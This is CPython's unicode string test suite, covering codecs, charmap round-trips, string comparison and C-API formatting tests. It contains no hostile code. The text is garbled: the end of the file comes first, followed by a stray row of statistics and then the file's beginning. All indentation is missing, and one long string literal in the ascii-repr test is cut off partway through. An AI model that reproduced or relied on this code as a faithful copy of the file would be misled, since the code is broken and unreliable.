self.assertEqual(str(b'Andr\202 x', 'ascii', 'ignore'), "Andr x")
self.assertEqual(str(b'Andr\202 x', 'ascii', 'replace'), 'Andr\uFFFD x')
self.assertEqual(str(b'\202 x', 'ascii', 'replace'), '\uFFFD x')
# Error handling (unknown character names)
self.assertEqual(b"\\N{foo}xx".decode("unicode-escape", "ignore"), "xx")
# Error handling (truncated escape sequence)
self.assertRaises(UnicodeError, b"\\".decode, "unicode-escape")
self.assertRaises(TypeError, b"hello".decode, "test.unicode1")
self.assertRaises(TypeError, str, b"hello", "test.unicode2")
self.assertRaises(TypeError, "hello".encode, "test.unicode1")
self.assertRaises(TypeError, "hello".encode, "test.unicode2")
# Error handling (wrong arguments)
self.assertRaises(TypeError, "hello".encode, 42, 42, 42)
# Error handling (lone surrogate in PyUnicode_TransformDecimalToASCII())
self.assertRaises(UnicodeError, float, "\ud800")
self.assertRaises(UnicodeError, float, "\udf00")
self.assertRaises(UnicodeError, complex, "\ud800")
self.assertRaises(UnicodeError, complex, "\udf00")
def test_codecs(self):
# Encoding
self.assertEqual('hello'.encode('ascii'), b'hello')
self.assertEqual('hello'.encode('utf-7'), b'hello')
self.assertEqual('hello'.encode('utf-8'), b'hello')
self.assertEqual('hello'.encode('utf-8'), b'hello')
self.assertEqual('hello'.encode('utf-16-le'), b'h\000e\000l\000l\000o\000')
self.assertEqual('hello'.encode('utf-16-be'), b'\000h\000e\000l\000l\000o')
self.assertEqual('hello'.encode('latin-1'), b'hello')
# Default encoding is utf-8
self.assertEqual('\u2603'.encode(), b'\xe2\x98\x83')
# Roundtrip safety for BMP (just the first 1024 chars)
for c in range(1024):
u = chr(c)
for encoding in ('utf-7', 'utf-8', 'utf-16', 'utf-16-le',
'utf-16-be', 'raw_unicode_escape',
'unicode_escape', 'unicode_internal'):
with warnings.catch_warnings():
# unicode-internal has been deprecated
warnings.simplefilter("ignore", DeprecationWarning)
self.assertEqual(str(u.encode(encoding),encoding), u)
# Roundtrip safety for BMP (just the first 256 chars)
for c in range(256):
u = chr(c)
for encoding in ('latin-1',):
self.assertEqual(str(u.encode(encoding),encoding), u)
# Roundtrip safety for BMP (just the first 128 chars)
for c in range(128):
u = chr(c)
for encoding in ('ascii',):
self.assertEqual(str(u.encode(encoding),encoding), u)
# Roundtrip safety for non-BMP (just a few chars)
with warnings.catch_warnings():
# unicode-internal has been deprecated
warnings.simplefilter("ignore", DeprecationWarning)
u = '\U00010001\U00020002\U00030003\U00040004\U00050005'
for encoding in ('utf-8', 'utf-16', 'utf-16-le', 'utf-16-be',
'raw_unicode_escape',
'unicode_escape', 'unicode_internal'):
self.assertEqual(str(u.encode(encoding),encoding), u)
# UTF-8 must be roundtrip safe for all code points
# (except surrogates, which are forbidden).
u = ''.join(map(chr, list(range(0, 0xd800)) +
list(range(0xe000, 0x110000))))
for encoding in ('utf-8',):
self.assertEqual(str(u.encode(encoding),encoding), u)
def test_codecs_charmap(self):
# 0-127
s = bytes(range(128))
for encoding in (
'cp037', 'cp1026', 'cp273',
'cp437', 'cp500', 'cp720', 'cp737', 'cp775', 'cp850',
'cp852', 'cp855', 'cp858', 'cp860', 'cp861', 'cp862',
'cp863', 'cp865', 'cp866', 'cp1125',
'iso8859_10', 'iso8859_13', 'iso8859_14', 'iso8859_15',
'iso8859_2', 'iso8859_3', 'iso8859_4', 'iso8859_5', 'iso8859_6',
'iso8859_7', 'iso8859_9',
'koi8_r', 'koi8_t', 'koi8_u', 'kz1048', 'latin_1',
'mac_cyrillic', 'mac_latin2',
'cp1250', 'cp1251', 'cp1252', 'cp1253', 'cp1254', 'cp1255',
'cp1256', 'cp1257', 'cp1258',
'cp856', 'cp857', 'cp864', 'cp869', 'cp874',
'mac_greek', 'mac_iceland','mac_roman', 'mac_turkish',
'cp1006', 'iso8859_8',
### These have undefined mappings:
#'cp424',
### These fail the round-trip:
#'cp875'
):
self.assertEqual(str(s, encoding).encode(encoding), s)
# 128-255
s = bytes(range(128, 256))
for encoding in (
'cp037', 'cp1026', 'cp273',
'cp437', 'cp500', 'cp720', 'cp737', 'cp775', 'cp850',
'cp852', 'cp855', 'cp858', 'cp860', 'cp861', 'cp862',
'cp863', 'cp865', 'cp866', 'cp1125',
'iso8859_10', 'iso8859_13', 'iso8859_14', 'iso8859_15',
'iso8859_2', 'iso8859_4', 'iso8859_5',
'iso8859_9', 'koi8_r', 'koi8_u', 'latin_1',
'mac_cyrillic', 'mac_latin2',
### These have undefined mappings:
#'cp1250', 'cp1251', 'cp1252', 'cp1253', 'cp1254', 'cp1255',
#'cp1256', 'cp1257', 'cp1258',
#'cp424', 'cp856', 'cp857', 'cp864', 'cp869', 'cp874',
#'iso8859_3', 'iso8859_6', 'iso8859_7', 'koi8_t', 'kz1048',
#'mac_greek', 'mac_iceland','mac_roman', 'mac_turkish',
### These fail the round-trip:
#'cp1006', 'cp875', 'iso8859_8',
):
self.assertEqual(str(s, encoding).encode(encoding), s)
def test_concatenation(self):
self.assertEqual(("abc" "def"), "abcdef")
self.assertEqual(("abc" "def"), "abcdef")
self.assertEqual(("abc" "def"), "abcdef")
self.assertEqual(("abc" "def" "ghi"), "abcdefghi")
self.assertEqual(("abc" "def" "ghi"), "abcdefghi")
def test_printing(self):
class BitBucket:
def write(self, text):
pass
out = BitBucket()
print('abc', file=out)
print('abc', 'def', file=out)
print('abc', 'def', file=out)
print('abc', 'def', file=out)
print('abc\n', file=out)
print('abc\n', end=' ', file=out)
print('abc\n', end=' ', file=out)
print('def\n', file=out)
print('def\n', file=out)
def test_ucs4(self):
x = '\U00100000'
y = x.encode("raw-unicode-escape").decode("raw-unicode-escape")
self.assertEqual(x, y)
y = br'\U00100000'
x = y.decode("raw-unicode-escape").encode("raw-unicode-escape")
self.assertEqual(x, y)
y = br'\U00010000'
x = y.decode("raw-unicode-escape").encode("raw-unicode-escape")
self.assertEqual(x, y)
try:
br'\U11111111'.decode("raw-unicode-escape")
except UnicodeDecodeError as e:
self.assertEqual(e.start, 0)
self.assertEqual(e.end, 10)
else:
self.fail("Should have raised UnicodeDecodeError")
def test_conversion(self):
# Make sure __str__() works properly
class ObjectToStr:
def __str__(self):
return "foo"
class StrSubclassToStr(str):
def __str__(self):
return "foo"
class StrSubclassToStrSubclass(str):
def __new__(cls, content=""):
return str.__new__(cls, 2*content)
def __str__(self):
return self
self.assertEqual(str(ObjectToStr()), "foo")
self.assertEqual(str(StrSubclassToStr("bar")), "foo")
s = str(StrSubclassToStrSubclass("foo"))
self.assertEqual(s, "foofoo")
self.assertIs(type(s), StrSubclassToStrSubclass)
s = StrSubclass(StrSubclassToStrSubclass("foo"))
self.assertEqual(s, "foofoo")
self.assertIs(type(s), StrSubclass)
def test_unicode_repr(self):
class s1:
def __repr__(self):
return '\\n'
class s2:
def __repr__(self):
return '\\n'
self.assertEqual(repr(s1()), '\\n')
self.assertEqual(repr(s2()), '\\n')
def test_printable_repr(self):
self.assertEqual(repr('\U00010000'), "'%c'" % (0x10000,)) # printable
self.assertEqual(repr('\U00014000'), "'\\U00014000'") # nonprintable
# This test only affects 32-bit platforms because expandtabs can only take
# an int as the max value, not a 64-bit C long. If expandtabs is changed
# to take a 64-bit long, this test should apply to all platforms.
@unittest.skipIf(sys.maxsize > (1 << 32) or struct.calcsize('P') != 4,
'only applies to 32-bit platforms')
def test_expandtabs_overflows_gracefully(self):
self.assertRaises(OverflowError, 't\tt\t'.expandtabs, sys.maxsize)
@support.cpython_only
def test_expandtabs_optimization(self):
s = 'abc'
self.assertIs(s.expandtabs(), s)
def test_raiseMemError(self):
if struct.calcsize('P') == 8:
# 64 bits pointers
ascii_struct_size = 48
compact_struct_size = 72
else:
# 32 bits pointers
ascii_struct_size = 24
compact_struct_size = 36
for char in ('a', '\xe9', '\u20ac', '\U0010ffff'):
code = ord(char)
if code < 0x100:
char_size = 1 # sizeof(Py_UCS1)
struct_size = ascii_struct_size
elif code < 0x10000:
char_size = 2 # sizeof(Py_UCS2)
struct_size = compact_struct_size
else:
char_size = 4 # sizeof(Py_UCS4)
struct_size = compact_struct_size
# Note: sys.maxsize is half of the actual max allocation because of
# the signedness of Py_ssize_t. Strings of maxlen-1 should in principle
# be allocatable, given enough memory.
maxlen = ((sys.maxsize - struct_size) // char_size)
alloc = lambda: char * maxlen
self.assertRaises(MemoryError, alloc)
self.assertRaises(MemoryError, alloc)
def test_format_subclass(self):
class S(str):
def __str__(self):
return '__str__ overridden'
s = S('xxx')
self.assertEqual("%s" % s, '__str__ overridden')
self.assertEqual("{}".format(s), '__str__ overridden')
def test_subclass_add(self):
class S(str):
def __add__(self, o):
return "3"
self.assertEqual(S("4") + S("5"), "3")
class S(str):
def __iadd__(self, o):
return "3"
s = S("1")
s += "4"
self.assertEqual(s, "3")
def test_getnewargs(self):
text = 'abc'
args = text.__getnewargs__()
self.assertIsNot(args[0], text)
self.assertEqual(args[0], text)
self.assertEqual(len(args), 1)
def test_resize(self):
for length in range(1, 100, 7):
# generate a fresh string (refcount=1)
text = 'a' * length + 'b'
with support.check_warnings(('unicode_internal codec has been '
'deprecated', DeprecationWarning)):
# fill wstr internal field
abc = text.encode('unicode_internal')
self.assertEqual(abc.decode('unicode_internal'), text)
# resize text: wstr field must be cleared and then recomputed
text += 'c'
abcdef = text.encode('unicode_internal')
self.assertNotEqual(abc, abcdef)
self.assertEqual(abcdef.decode('unicode_internal'), text)
def test_compare(self):
# Issue #17615
N = 10
ascii = 'a' * N
ascii2 = 'z' * N
latin = '\x80' * N
latin2 = '\xff' * N
bmp = '\u0100' * N
bmp2 = '\uffff' * N
astral = '\U00100000' * N
astral2 = '\U0010ffff' * N
strings = (
ascii, ascii2,
latin, latin2,
bmp, bmp2,
astral, astral2)
for text1, text2 in itertools.combinations(strings, 2):
equal = (text1 is text2)
self.assertEqual(text1 == text2, equal)
self.assertEqual(text1 != text2, not equal)
if equal:
self.assertTrue(text1 <= text2)
self.assertTrue(text1 >= text2)
# text1 is text2: duplicate strings to skip the "str1 == str2"
# optimization in unicode_compare_eq() and really compare
# character per character
copy1 = duplicate_string(text1)
copy2 = duplicate_string(text2)
self.assertIsNot(copy1, copy2)
self.assertTrue(copy1 == copy2)
self.assertFalse(copy1 != copy2)
self.assertTrue(copy1 <= copy2)
self.assertTrue(copy2 >= copy2)
self.assertTrue(ascii < ascii2)
self.assertTrue(ascii < latin)
self.assertTrue(ascii < bmp)
self.assertTrue(ascii < astral)
self.assertFalse(ascii >= ascii2)
self.assertFalse(ascii >= latin)
self.assertFalse(ascii >= bmp)
self.assertFalse(ascii >= astral)
self.assertFalse(latin < ascii)
self.assertTrue(latin < latin2)
self.assertTrue(latin < bmp)
self.assertTrue(latin < astral)
self.assertTrue(latin >= ascii)
self.assertFalse(latin >= latin2)
self.assertFalse(latin >= bmp)
self.assertFalse(latin >= astral)
self.assertFalse(bmp < ascii)
self.assertFalse(bmp < latin)
self.assertTrue(bmp < bmp2)
self.assertTrue(bmp < astral)
self.assertTrue(bmp >= ascii)
self.assertTrue(bmp >= latin)
self.assertFalse(bmp >= bmp2)
self.assertFalse(bmp >= astral)
self.assertFalse(astral < ascii)
self.assertFalse(astral < latin)
self.assertFalse(astral < bmp2)
self.assertTrue(astral < astral2)
self.assertTrue(astral >= ascii)
self.assertTrue(astral >= latin)
self.assertTrue(astral >= bmp2)
self.assertFalse(astral >= astral2)
def test_free_after_iterating(self):
support.check_free_after_iterating(self, iter, str)
support.check_free_after_iterating(self, reversed, str)
class CAPITest(unittest.TestCase):
# Test PyUnicode_FromFormat()
def test_from_format(self):
support.import_module('ctypes')
from ctypes import (
pythonapi, py_object, sizeof,
c_int, c_long, c_longlong, c_ssize_t,
c_uint, c_ulong, c_ulonglong, c_size_t, c_void_p)
name = "PyUnicode_FromFormat"
_PyUnicode_FromFormat = getattr(pythonapi, name)
_PyUnicode_FromFormat.restype = py_object
def PyUnicode_FromFormat(format, *args):
cargs = tuple(
py_object(arg) if isinstance(arg, str) else arg
for arg in args)
return _PyUnicode_FromFormat(format, *cargs)
def check_format(expected, format, *args):
text = PyUnicode_FromFormat(format, *args)
self.assertEqual(expected, text)
# ascii format, non-ascii argument
check_format('ascii\x7f=unicode\xe9',
b'ascii\x7f=%U', 'unicode\xe9')
# non-ascii format, ascii argument: ensure that PyUnicode_FromFormatV()
# raises an error
self.assertRaisesRegex(ValueError,
r'^PyUnicode_FromFormatV\(\) expects an ASCII-encoded format '
'string, got a non-ASCII byte: 0xe9$',
PyUnicode_FromFormat, b'unicode\xe9=%s', 'ascii')
# test "%c"
check_format('\uabcd',
b'%c', c_int(0xabcd))
check_format('\U0010ffff',
b'%c', c_int(0x10ffff))
with self.assertRaises(OverflowError):
PyUnicode_FromFormat(b'%c', c_int(0x110000))
# Issue #18183
check_format('\U00010000\U00100000',
b'%c%c', c_int(0x10000), c_int(0x100000))
# test "%"
check_format('%',
b'%')
check_format('%',
b'%%')
check_format('%s',
b'%%s')
check_format('[%]',
b'[%%]')
check_format('%abc',
b'%%%s', b'abc')
# truncated string
check_format('abc',
b'%.3s', b'abcdef')
check_format('abc[\ufffd',
b'%.5s', 'abc[\u20ac]'.encode('utf8'))
check_format("'\\u20acABC'",
b'%A', '\u20acABC')
check_format("'\\u20",
b'%.5A', '\u20acABCDEF')
check_format("'\u20acABC'",
b'%R', '\u20acABC')
check_format("'\u20acA",
b'%.3R', '\u20acABCDEF')
check_format('\u20acAB',
b'%.3S', '\u20acABCDEF')
check_format('\u20acAB',
b'%.3U', '\u20acABCDEF')
check_format('\u20acAB',
b'%.3V', '\u20acABCDEF', None)
check_format('abc[\ufffd',
b'%.5V', None, 'abc[\u20ac]'.encode('utf8'))
# following tests comes from #7330
# test width modifier and precision modifier with %S
check_format("repr= abc",
b'repr=%5S', 'abc')
check_format("repr=ab",
b'repr=%.2S', 'abc')
check_format("repr= ab",
b'repr=%5.2S', 'abc')
# test width modifier and precision modifier with %R
check_format("repr= 'abc'",
b'repr=%8R', 'abc')
check_format("repr='ab",
b'repr=%.3R', 'abc')
check_format("repr= 'ab",
b'repr=%5.3R', 'abc')
# test width modifier and precision modifier with %A
check_format("repr= 'abc'",
b'repr=%8A', 'abc')
check_format("repr='ab",
b'repr=%.3A', 'abc')
check_format("repr= 'ab",
b'repr=%5.3A', 'abc')
# test width modifier and precision modifier with %s
check_format("repr= abc",
b'repr=%5s', b'abc')
check_format("repr=ab",
b'repr=%.2s', b'abc')
check_format("repr= ab",
b'repr=%5.2s', b'abc')
# test width modifier and precision modifier with %U
check_format("repr= abc",
b'repr=%5U', 'abc')
check_format("repr=ab",
b'repr=%.2U', 'abc')
check_format("repr= ab",
b'repr=%5.2U', 'abc')
# test width modifier and precision modifier with %V
check_format("repr= abc",
b'repr=%5V', 'abc', b'123')
check_format("repr=ab",
b'repr=%.2V', 'abc', b'123')
check_format("repr= ab",
b'repr=%5.2V', 'abc', b'123')
check_format("repr= 123",
b'repr=%5V', None, b'123')
check_format("repr=12",
b'repr=%.2V', None, b'123')
check_format("repr= 12",
b'repr=%5.2V', None, b'123')
# test integer formats (%i, %d, %u)
check_format('010',
b'%03i', c_int(10))
check_format('0010',
b'%0.4i', c_int(10))
check_format('-123',
b'%i', c_int(-123))
check_format('-123',
b'%li', c_long(-123))
check_format('-123',
b'%lli', c_longlong(-123))
check_format('-123',
b'%zi', c_ssize_t(-123))
check_format('-123',
b'%d', c_int(-123))
check_format('-123',
b'%ld', c_long(-123))
check_format('-123',
b'%lld', c_longlong(-123))
check_format('-123',
b'%zd', c_ssize_t(-123))
check_format('123',
b'%u', c_uint(123))
check_format('123',
b'%lu', c_ulong(123))
check_format('123',
b'%llu', c_ulonglong(123))
check_format('123',
b'%zu', c_size_t(123))
# test long output
min_longlong = -(2 ** (8 * sizeof(c_longlong) - 1))
max_longlong = -min_longlong - 1
check_format(str(min_longlong),
b'%lld', c_longlong(min_longlong))
check_format(str(max_longlong),
b'%lld', c_longlong(max_longlong))
max_ulonglong = 2 ** (8 * sizeof(c_ulonglong)) - 1
check_format(str(max_ulonglong),
b'%llu', c_ulonglong(max_ulonglong))
PyUnicode_FromFormat(b'%p', c_void_p(-1))
# test padding (width and/or precision)
check_format('123'.rjust(10, '0'),
b'%010i', c_int(123))
check_format('123'.rjust(100),
b'%100i', c_int(123))
check_format('123'.rjust(100, '0'),
b'%.100i', c_int(123))
check_format('123'.rjust(80, '0').rjust(100),
b'%100.80i', c_int(123))
check_format('123'.rjust(10, '0'),
b'%010u', c_uint(123))
check_format('123'.rjust(100),
b'%100u', c_uint(123))
check_format('123'.rjust(100, '0'),
b'%.100u', c_uint(123))
check_format('123'.rjust(80, '0').rjust(100),
b'%100.80u', c_uint(123))
check_format('123'.rjust(10, '0'),
b'%010x', c_int(0x123))
check_format('123'.rjust(100),
b'%100x', c_int(0x123))
check_format('123'.rjust(100, '0'),
b'%.100x', c_int(0x123))
check_format('123'.rjust(80, '0').rjust(100),
b'%100.80x', c_int(0x123))
# test %A
check_format(r"%A:'abc\xe9\uabcd\U0010ffff'",
b'%%A:%A', 'abc\xe9\uabcd\U0010ffff')
# test %V
check_format('repr=abc',
b'repr=%V', 'abc', b'xyz')
# Test string decode from parameter of %s using utf-8.
# b'\xe4\xba\xba\xe6\xb0\x91' is utf-8 encoded byte sequence of
# '\u4eba\u6c11'
check_format('repr=\u4eba\u6c11',
b'repr=%V', None, b'\xe4\xba\xba\xe6\xb0\x91')
#Test replace error handler.
check_format('repr=abc\ufffd',
b'repr=%V', None, b'abc\xff')
# not supported: copy the raw format string. these tests are just here
# to check for crashes and should not be considered as specifications
check_format('%s',
b'%1%s', b'abc')
check_format('%1abc',
b'%1abc')
check_format('%+i',
b'%+i', c_int(10))
check_format('%.%s',
b'%.%s', b'abc')
# Test PyUnicode_AsWideChar()
@support.cpython_only
def test_aswidechar(self):
from _testcapi import unicode_aswidechar
support.import_module('ctypes')
from ctypes import c_wchar, sizeof
wchar, size = unicode_aswidechar('abcdef', 2)
self.assertEqual(size, 2)
self.assertEqual(wchar, 'ab')
wchar, size = unicode_aswidechar('abc', 3)
self.assertEqual(size, 3)
self.assertEqual(wchar, 'abc')
wchar, size = unicode_aswidechar('abc', 4)
self.assertEqual(size, 3)
self.assertEqual(wchar, 'abc\0')
wchar, size = unicode_aswidechar('abc', 10)
self.assertEqual(size, 3)
self.assertEqual(wchar, 'abc\0')
wchar, size = unicode_aswidechar('abc\0def', 20)
self.assertEqual(size, 7)
self.assertEqual(wchar, 'abc\0def\0')
nonbmp = chr(0x10ffff)
if sizeof(c_wchar) == 2:
buflen = 3
nchar = 2
else: # sizeof(c_wchar) == 4
buflen = 2
nchar = 1
wchar, size = unicode_aswidechar(nonbmp, buflen)
self.assertEqual(size, nchar)
self.assertEqual(wchar, nonbmp + '\0')
# Test PyUnicode_AsWideCharString()
@support.cpython_only
def test_aswidecharstring(self):
from _testcapi import unicode_aswidecharstring
support.import_module('ctypes')
from ctypes import c_wchar, sizeof
wchar, size = unicode_aswidecharstring('abc')
self.assertEqual(size, 3)
self.assertEqual(wchar, 'abc\0')
wchar, size = unicode_aswidecharstring('abc\0def')
self.assertEqual(size, 7)
self.assertEqual(wchar, 'abc\0def\0')
nonbmp = chr(0x10ffff)
if sizeof(c_wchar) == 2:
nchar = 2
else: # sizeof(c_wchar) == 4
nchar = 1
wchar, size = unicode_aswidecharstring(nonbmp)
self.assertEqual(size, nchar)
self.assertEqual(wchar, nonbmp + '\0')
# Test PyUnicode_AsUCS4()
@support.cpython_only
def test_asucs4(self):
from _testcapi import unicode_asucs4
for s in ['abc', '\xa1\xa2', '\u4f60\u597d', 'a\U0001f600',
'a\ud800b\udfffc', '\ud834\udd1e']:
l = len(s)
self.assertEqual(unicode_asucs4(s, l, 1), s+'\0')
self.assertEqual(unicode_asucs4(s, l, 0), s+'\uffff')
self.assertEqual(unicode_asucs4(s, l+1, 1), s+'\0\uffff')
self.assertEqual(unicode_asucs4(s, l+1, 0), s+'\0\uffff')
self.assertRaises(SystemError, unicode_asucs4, s, l-1, 1)
self.assertRaises(SystemError, unicode_asucs4, s, l-2, 0)
s = '\0'.join([s, s])
self.assertEqual(unicode_asucs4(s, len(s), 1), s+'\0')
self.assertEqual(unicode_asucs4(s, len(s), 0), s+'\uffff')
# Test PyUnicode_FindChar()
@support.cpython_only
def test_findchar(self):
from _testcapi import unicode_findchar
for str in "\xa1", "\u8000\u8080", "\ud800\udc02", "\U0001f100\U0001f1f1":
for i, ch in enumerate(str):
self.assertEqual(unicode_findchar(str, ord(ch), 0, len(str), 1), i)
self.assertEqual(unicode_findchar(str, ord(ch), 0, len(str), -1), i)
str = "!>_<!"
self.assertEqual(unicode_findchar(str, 0x110000, 0, len(str), 1), -1)
self.assertEqual(unicode_findchar(str, 0x110000, 0, len(str), -1), -1)
# start < end
self.assertEqual(unicode_findchar(str, ord('!'), 1, len(str)+1, 1), 4)
self.assertEqual(unicode_findchar(str, ord('!'), 1, len(str)+1, -1), 4)
# start >= end
self.assertEqual(unicode_findchar(str, ord('!'), 0, 0, 1), -1)
self.assertEqual(unicode_findchar(str, ord('!'), len(str), 0, 1), -1)
# negative
self.assertEqual(unicode_findchar(str, ord('!'), -len(str), -1, 1), 0)
self.assertEqual(unicode_findchar(str, ord('!'), -len(str), -1, -1), 0)
# Test PyUnicode_CopyCharacters()
@support.cpython_only
def test_copycharacters(self):
from _testcapi import unicode_copycharacters
strings = [
'abcde', '\xa1\xa2\xa3\xa4\xa5',
'\u4f60\u597d\u4e16\u754c\uff01',
'\U0001f600\U0001f601\U0001f602\U0001f603\U0001f604'
]
for idx, from_ in enumerate(strings):
# wide -> narrow: exceed maxchar limitation
for to in strings[:idx]:
self.assertRaises(
SystemError,
unicode_copycharacters, to, 0, from_, 0, 5
)
# same kind
for from_start in range(5):
self.assertEqual(
unicode_copycharacters(from_, 0, from_, from_start, 5),
(from_[from_start:from_start+5].ljust(5, '\0'),
5-from_start)
)
for to_start in range(5):
self.assertEqual(
unicode_copycharacters(from_, to_start, from_, to_start, 5),
(from_[to_start:to_start+5].rjust(5, '\0'),
5-to_start)
)
# narrow -> wide
# Tests omitted since this creates invalid strings.
s = strings[0]
self.assertRaises(IndexError, unicode_copycharacters, s, 6, s, 0, 5)
self.assertRaises(IndexError, unicode_copycharacters, s, -1, s, 0, 5)
self.assertRaises(IndexError, unicode_copycharacters, s, 0, s, 6, 5)
self.assertRaises(IndexError, unicode_copycharacters, s, 0, s, -1, 5)
self.assertRaises(SystemError, unicode_copycharacters, s, 1, s, 0, 5)
self.assertRaises(SystemError, unicode_copycharacters, s, 0, s, 0, -1)
self.assertRaises(SystemError, unicode_copycharacters, s, 0, b'', 0, 0)
@support.cpython_only
def test_encode_decimal(self):
from _testcapi import unicode_encodedecimal
self.assertEqual(unicode_encodedecimal('123'),
b'123')
self.assertEqual(unicode_encodedecimal('\u0663.\u0661\u0664'),
b'3.14')
self.assertEqual(unicode_encodedecimal("\N{EM SPACE}3.14\N{EN SPACE}"),
b' 3.14 ')
self.assertRaises(UnicodeEncodeError,
unicode_encodedecimal, "123\u20ac", "strict")
self.assertRaisesRegex(
ValueError,
"^'decimal' codec can't encode character",
unicode_encodedecimal, "123\u20ac", "replace")
@support.cpython_only
def test_transform_decimal(self):
from _testcapi import unicode_transformdecimaltoascii as transform_decimal
self.assertEqual(transform_decimal('123'),
'123')
self.assertEqual(transform_decimal('\u0663.\u0661\u0664'),
'3.14')
self.assertEqual(transform_decimal("\N{EM SPACE}3.14\N{EN SPACE}"),
"\N{EM SPACE}3.14\N{EN SPACE}")
self.assertEqual(transform_decimal('123\u20ac'),
'123\u20ac')
@support.cpython_only
def test_pep393_utf8_caching_bug(self):
# Issue #25709: Problem with string concatenation and utf-8 cache
from _testcapi import getargs_s_hash
for k in 0x24, 0xa4, 0x20ac, 0x1f40d:
s = ''
for i in range(5):
# Due to CPython specific optimization the 's' string can be
# resized in-place.
s += chr(k)
# Parsing with the "s#" format code calls indirectly
# PyUnicode_AsUTF8AndSize() which creates the UTF-8
# encoded string cached in the Unicode object.
self.assertEqual(getargs_s_hash(s), chr(k).encode() * (i + 1))
# Check that the second call returns the same result
self.assertEqual(getargs_s_hash(s), chr(k).encode() * (i + 1))
class StringModuleTest(unittest.TestCase):
def test_formatter_parser(self):
def parse(format):
return list(_string.formatter_parser(format))
formatter = parse("prefix {2!s}xxx{0:^+10.3f}{obj.attr!s} {z[0]!s:10}")
self.assertEqual(formatter, [
('prefix ', '2', '', 's'),
('xxx', '0', '^+10.3f', None),
('', 'obj.attr', '', 's'),
(' ', 'z[0]', '10', 's'),
])
formatter = parse("prefix {} suffix")
self.assertEqual(formatter, [
('prefix ', '', '', None),
(' suffix', None, None, None),
])
formatter = parse("str")
self.assertEqual(formatter, [
('str', None, None, None),
])
formatter = parse("")
self.assertEqual(formatter, [])
formatter = parse("{0}")
self.assertEqual(formatter, [
('', '0', '', None),
])
self.assertRaises(TypeError, _string.formatter_parser, 1)
def test_formatter_field_name_split(self):
def split(name):
items = list(_string.formatter_field_name_split(name))
items[1] = list(items[1])
return items
self.assertEqual(split("obj"), ["obj", []])
self.assertEqual(split("obj.arg"), ["obj", [(True, 'arg')]])
self.assertEqual(split("obj[key]"), ["obj", [(False, 'key')]])
self.assertEqual(split("obj.arg[key1][key2]"), [
"obj",
[(True, 'arg'),
(False, 'key1'),
(False, 'key2'),
]])
self.assertRaises(TypeError, _string.formatter_field_name_split, 1)
if __name__ == "__main__":
unittest.main()
| 45.465956
| 120
| 0.534886
|
import _string
import codecs
import itertools
import operator
import struct
import string
import sys
import unittest
import warnings
from test import support, string_tests
def search_function(encoding):
def decode1(input, errors="strict"):
return 42
def encode1(input, errors="strict"):
return 42
def encode2(input, errors="strict"):
return (42, 42)
def decode2(input, errors="strict"):
return (42, 42)
if encoding=="test.unicode1":
return (encode1, decode1, None, None)
elif encoding=="test.unicode2":
return (encode2, decode2, None, None)
else:
return None
codecs.register(search_function)
def duplicate_string(text):
return text.encode().decode()
class StrSubclass(str):
pass
class UnicodeTest(string_tests.CommonTest,
string_tests.MixinStrUnicodeUserStringTest,
string_tests.MixinStrUnicodeTest,
unittest.TestCase):
type2test = str
def checkequalnofix(self, result, object, methodname, *args):
method = getattr(object, methodname)
realresult = method(*args)
self.assertEqual(realresult, result)
self.assertTrue(type(realresult) is type(result))
if realresult is object:
class usub(str):
def __repr__(self):
return 'usub(%r)' % str.__repr__(self)
object = usub(object)
method = getattr(object, methodname)
realresult = method(*args)
self.assertEqual(realresult, result)
self.assertTrue(object is not realresult)
def test_literals(self):
self.assertEqual('\xff', '\u00ff')
self.assertEqual('\uffff', '\U0000ffff')
self.assertRaises(SyntaxError, eval, '\'\\Ufffffffe\'')
self.assertRaises(SyntaxError, eval, '\'\\Uffffffff\'')
self.assertRaises(SyntaxError, eval, '\'\\U%08x\'' % 0x110000)
# raw strings should not have unicode escapes
self.assertNotEqual(r"\u0020", " ")
def test_ascii(self):
if not sys.platform.startswith('java'):
# Test basic sanity of repr()
self.assertEqual(ascii('abc'), "'abc'")
self.assertEqual(ascii('ab\\c'), "'ab\\\\c'")
self.assertEqual(ascii('ab\\'), "'ab\\\\'")
self.assertEqual(ascii('\\c'), "'\\\\c'")
self.assertEqual(ascii('\\'), "'\\\\'")
self.assertEqual(ascii('\n'), "'\\n'")
self.assertEqual(ascii('\r'), "'\\r'")
self.assertEqual(ascii('\t'), "'\\t'")
self.assertEqual(ascii('\b'), "'\\x08'")
self.assertEqual(ascii("'\""), """'\\'"'""")
self.assertEqual(ascii("'\""), """'\\'"'""")
self.assertEqual(ascii("'"), '''"'"''')
self.assertEqual(ascii('"'), """'"'""")
latin1repr = (
"'\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\t\\n\\x0b\\x0c\\r"
"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a"
"\\x1b\\x1c\\x1d\\x1e\\x1f !\"
"JKLMNOPQRSTUVWXYZ[\\\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\\x7f"
"\\x80\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d"
"\\x8e\\x8f\\x90\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b"
"\\x9c\\x9d\\x9e\\x9f\\xa0\\xa1\\xa2\\xa3\\xa4\\xa5\\xa6\\xa7\\xa8\\xa9"
"\\xaa\\xab\\xac\\xad\\xae\\xaf\\xb0\\xb1\\xb2\\xb3\\xb4\\xb5\\xb6\\xb7"
"\\xb8\\xb9\\xba\\xbb\\xbc\\xbd\\xbe\\xbf\\xc0\\xc1\\xc2\\xc3\\xc4\\xc5"
"\\xc6\\xc7\\xc8\\xc9\\xca\\xcb\\xcc\\xcd\\xce\\xcf\\xd0\\xd1\\xd2\\xd3"
"\\xd4\\xd5\\xd6\\xd7\\xd8\\xd9\\xda\\xdb\\xdc\\xdd\\xde\\xdf\\xe0\\xe1"
"\\xe2\\xe3\\xe4\\xe5\\xe6\\xe7\\xe8\\xe9\\xea\\xeb\\xec\\xed\\xee\\xef"
"\\xf0\\xf1\\xf2\\xf3\\xf4\\xf5\\xf6\\xf7\\xf8\\xf9\\xfa\\xfb\\xfc\\xfd"
"\\xfe\\xff'")
testrepr = ascii(''.join(map(chr, range(256))))
self.assertEqual(testrepr, latin1repr)
# Test ascii works on wide unicode escapes without overflow.
self.assertEqual(ascii("\U00010000" * 39 + "\uffff" * 4096),
ascii("\U00010000" * 39 + "\uffff" * 4096))
class WrongRepr:
def __repr__(self):
return b'byte-repr'
self.assertRaises(TypeError, ascii, WrongRepr())
def test_repr(self):
